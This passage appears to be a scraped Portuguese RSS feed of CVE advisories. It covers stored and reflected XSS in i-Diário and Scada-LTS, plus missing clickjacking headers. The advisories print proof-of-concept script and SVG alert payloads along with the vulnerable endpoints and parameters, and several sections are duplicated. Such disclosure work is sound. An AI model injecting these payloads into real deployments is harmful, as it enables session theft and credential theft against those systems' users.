class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">svg</span> <span class="na">xmlns</span><span class="o">=</span><span class="s">""</span><span class="na">http:</span><span class="err">//</span><span class="na">www</span><span class="err">.</span><span class="na">w3</span><span class="err">.</span><span class="na">org</span><span class="err">/</span><span class="na">2000</span><span class="err">/</span><span class="na">svg</span><span class="err">""</span> <span class="na">fill</span><span class="o">=</span><span class="s">""</span><span class="na">none</span><span class="err">""</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s2">""</span><span class="nx">This</span> <span class="nx">is</span> <span class="nx">an</span> <span class="nx">XSS</span><span class="o">-</span><span class="nx">POC</span> <span class="nx">from</span> <span class="nx">CVEHUNTERS</span><span class="s2">""</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">svg</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9145/image.png" width="635" height="266" srcset="/p/cve-2025-9145/image_hu_19b8b3d221202a9e.png 480w, /p/cve-2025-9145/image_hu_ce8f7117cded72f5.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="572px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9145.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9145.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9104/ https://www.cvehunters.com/pt/p/cve-2025-9104/ <h2 id="cve-2025-9104-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-aulas-por-disciplinaid">CVE-2025-9104: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/planos-de-aulas-por-disciplina/(ID)</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9104" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9104</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/planos-de-aulas-por-disciplina/(ID)</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Parecer</code>, <code>Objeto de Conhecimento</code> e <code>Habilidades</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-9104-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-aulas-por-disciplinaid">CVE-2025-9104: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/planos-de-aulas-por-disciplina/(ID)</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9104" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9104</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/planos-de-aulas-por-disciplina/(ID)</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Parecer</code>, <code>Objeto de Conhecimento</code> e <code>Habilidades</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/planos-de-aulas-por-disciplina/(ID)</code></p> <p>Parâmetros:<code>Parecer</code>, <code>Objeto de Conhecimento</code> e <code>Habilidades</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>Parecer</code>, <code>Objeto de Conhecimento</code> e <code>Habilidades</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">ScRipT</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</</span><span class="nt">ScRipT</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9104/image.png" width="967" height="843" srcset="/p/cve-2025-9104/image_hu_3d05674558fa6ba6.png 480w, /p/cve-2025-9104/image_hu_776361e30dbe0dfd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="275px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9104.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9104.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9105/ https://www.cvehunters.com/pt/p/cve-2025-9105/ <h2 id="cve-2025-9105-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-ensino-por-areas-de-conhecimentoid">CVE-2025-9105: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9105" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9105</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Habilidades</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code></p><h2 id="cve-2025-9105-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-ensino-por-areas-de-conhecimentoid">CVE-2025-9105: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9105" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9105</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Habilidades</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code></p> <p>Parâmetros:<code>Parecer</code>, <code>Conteúdos</code> e <code>Habilidades</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Habilidades</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9105/image.png" width="964" height="445" srcset="/p/cve-2025-9105/image_hu_6a8ccd33487555d5.png 480w, /p/cve-2025-9105/image_hu_3c579fd2be61c8bf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="519px" /></p> <p><img src="/p/cve-2025-9105/image-1.png" width="682" height="415" srcset="/p/cve-2025-9105/image-1_hu_79d858c0f7af1de1.png 480w, /p/cve-2025-9105/image-1_hu_a6bd84db6d6c2b22.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="164" data-flex-basis="394px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9105.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9105.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9106/ https://www.cvehunters.com/pt/p/cve-2025-9106/ <h2 id="cve-2025-9106-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-ensino-por-disciplinaid">CVE-2025-9106: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/planos-de-ensino-por-disciplina/[ID]</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9106" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9106</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/planos-de-ensino-por-disciplina/[ID]</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Objetivos</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/planos-de-ensino-por-disciplina/[ID]</code></p><h2 id="cve-2025-9106-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-ensino-por-disciplinaid">CVE-2025-9106: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/planos-de-ensino-por-disciplina/[ID]</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9106" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9106</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/planos-de-ensino-por-disciplina/[ID]</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Objetivos</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/planos-de-ensino-por-disciplina/[ID]</code></p> <p>Parâmetros:<code>Parecer</code>, <code>Conteúdos</code> e <code>Objetivos</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Objetivos</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9106/image.png" width="960" height="455" srcset="/p/cve-2025-9106/image_hu_bfb635a7cbffc853.png 480w, /p/cve-2025-9106/image_hu_8eac10bb6159118e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="210" data-flex-basis="506px" /></p> <p><img src="/p/cve-2025-9106/image-1.png" width="653" height="412" srcset="/p/cve-2025-9106/image-1_hu_aec1559962a33def.png 480w, /p/cve-2025-9106/image-1_hu_8b0ce06d2d54dc01.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="158" data-flex-basis="380px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9106%20.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9106%20.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9107/ https://www.cvehunters.com/pt/p/cve-2025-9107/ <h2 id="cve-2025-9107-cross-site-scripting-xss-refletido-no-endpoint-search_autocomplete-parâmetro-q">CVE-2025-9107: Cross-Site Scripting (XSS) Refletido no endpoint <code>search_autocomplete</code> parâmetro <code>q</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9107" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9107</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>search_autocomplete</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>q</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>search_autocomplete</code></p> <p>Parâmetro: <code>q</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>q</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-9107-cross-site-scripting-xss-refletido-no-endpoint-search_autocomplete-parâmetro-q">CVE-2025-9107: Cross-Site Scripting (XSS) Refletido no endpoint <code>search_autocomplete</code> parâmetro <code>q</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9107" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9107</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>search_autocomplete</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>q</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>search_autocomplete</code></p> <p>Parâmetro: <code>q</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>q</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9107/image.png" width="861" height="1054" srcset="/p/cve-2025-9107/image_hu_8aadeff40c8f3d51.png 480w, /p/cve-2025-9107/image_hu_3012aeb2aec1845.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="81" data-flex-basis="196px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9107.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9107.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9108/ https://www.cvehunters.com/pt/p/cve-2025-9108/ <h2 id="cve-2025-9108-cabeçalhos-x-frame-options-ou-content-security-policy-ausentes">CVE-2025-9108: Cabeçalhos <code>X-Frame-Options</code> ou <code>Content-Security-Policy</code> ausentes </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9108" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9108</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">O aplicativo não implementa mecanismos de proteção contra <code>Clickjacking</code>. Isso permite que páginas legítimas sejam incorporadas em iframes maliciosos, levando os usuários a interagir com elementos invisíveis ou disfarçados, o que pode resultar em sequestro de sessão, ações não intencionais e outros ataques.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>https://x.x.x.x/login</code></p> <p style="text-align: justify;">A resposta HTTP da página não inclui os seguintes cabeçalhos:</br><li>X-Frame-Options</li><li>Content-Security-Policy: frame-ancestors 'none';</li></p><h2 id="cve-2025-9108-cabeçalhos-x-frame-options-ou-content-security-policy-ausentes">CVE-2025-9108: Cabeçalhos <code>X-Frame-Options</code> ou <code>Content-Security-Policy</code> ausentes </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9108" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9108</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">O aplicativo não implementa mecanismos de proteção contra <code>Clickjacking</code>. Isso permite que páginas legítimas sejam incorporadas em iframes maliciosos, levando os usuários a interagir com elementos invisíveis ou disfarçados, o que pode resultar em sequestro de sessão, ações não intencionais e outros ataques.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>https://x.x.x.x/login</code></p> <p style="text-align: justify;">A resposta HTTP da página não inclui os seguintes cabeçalhos:</br><li>X-Frame-Options</li><li>Content-Security-Policy: frame-ancestors 'none';</li></p> <p>Resposta HTTP do aplicativo:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HTTP/1.1 200 OK </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=UTF-8 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Missing Headers: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">X-Frame-Options </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Content-Security-Policy: frame-ancestors 'none'; </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Essa ausência permite que o aplicativo seja incorporado a elementos <code>iframe</code> em sites de terceiros.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Execução de ações não autorizadas: Os invasores podem induzir os usuários a clicar em botões ou links ocultos, executando ações críticas sem o seu consentimento.</li> <li>Roubo de credenciais: Um clique disfarçado pode levar os usuários a inserir informações confidenciais, como logins e senhas.</li> <li>Transferência de fundos ou compras não autorizadas: Os usuários podem ser induzidos a autorizar transações financeiras em sites bancários ou de comércio eletrônico.</li> <li>Alteração das configurações da conta: Os invasores podem explorar o clickjacking para induzir as vítimas a desabilitar recursos de segurança ou alterar e-mails de recuperação.</li> <li>Instalação de malware: Cliques manipulados podem iniciar o download de arquivos maliciosos sem o conhecimento do usuário.</li> <li>Escalonamento de privilégios: Em aplicativos administrativos, uma Um clique pode conceder acesso elevado a invasores.</li> <li>Perda de confiança: O impacto psicológico e reputacional na organização pode ser significativo, pois os usuários percebem o site como inseguro.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://vuldb.com/?submit.627923" target="_blank" rel="noopener" >https://vuldb.com/?submit.627923</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/vanderlei-princival/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/vanderlei50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/vanderlei-princival/" target="_blank" rel="noopener" >Vanderlei Princival</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9109/ https://www.cvehunters.com/pt/p/cve-2025-9109/ <h2 id="cve-2025-9109-a-vulnerabilidade-de-enumeração-de-usuários-foi-identificada-na-funcionalidade-esqueceu-a-senha">CVE-2025-9109: A vulnerabilidade de enumeração de usuários foi identificada na funcionalidade <code>Esqueceu a 